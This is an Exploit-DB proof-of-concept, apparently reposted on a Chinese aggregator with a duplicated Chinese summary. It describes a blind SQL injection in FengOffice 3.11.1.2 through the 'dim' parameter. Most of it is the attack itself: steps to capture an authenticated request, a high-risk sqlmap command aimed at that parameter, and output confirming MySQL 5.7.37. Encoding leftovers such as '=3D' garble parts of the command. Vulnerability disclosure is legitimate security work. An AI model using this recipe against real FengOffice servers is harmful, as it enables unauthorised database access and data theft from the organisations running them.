[webapps] Feng Office 3.11.1.2 - SQL Injection
该文章描述了FengOffice 3.11.1.2版本中存在盲SQL注入漏洞,攻击者可通过登录应用并利用"dim"参数进行注入攻击。使用sqlmap工具可自动化 exploitation 过程,并成功识别后端数据库为MySQL 5.7.37版本。 2025-4-10 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:2 收藏
该文章描述了FengOffice 3.11.1.2版本中存在盲SQL注入漏洞,攻击者可通过登录应用并利用"dim"参数进行注入攻击。使用sqlmap工具可自动化 exploitation 过程,并成功识别后端数据库为MySQL 5.7.37版本。 2025-4-10 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:2 收藏
# Exploit Title: Blind SQL Injection - FengOffice
# Date: 7/2024
# Exploit Author: Andrey Stoykov
# Version: 3.11.1.2
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com
SQL Injection:
1. Login to application
2. Click on "Workspaces"
3. Copy full URL
4. Paste the HTTP GET request into text file
5. Set the injection point to be in the "dim" parameter value
6. Use SQLMap to automate the process
sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=3Dmysql -p dim =
--fingerprint
[...]
[12:13:03] [INFO] confirming MySQL
[12:13:04] [INFO] the back-end DBMS is MySQL
[12:13:04] [INFO] actively fingerprinting MySQL
[12:13:05] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache
back-end DBMS: active fingerprint: MySQL >=3D 5.7
comment injection fingerprint: MySQL 5.7.37
[...]
文章来源: https://www.exploit-db.com/exploits/52154
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh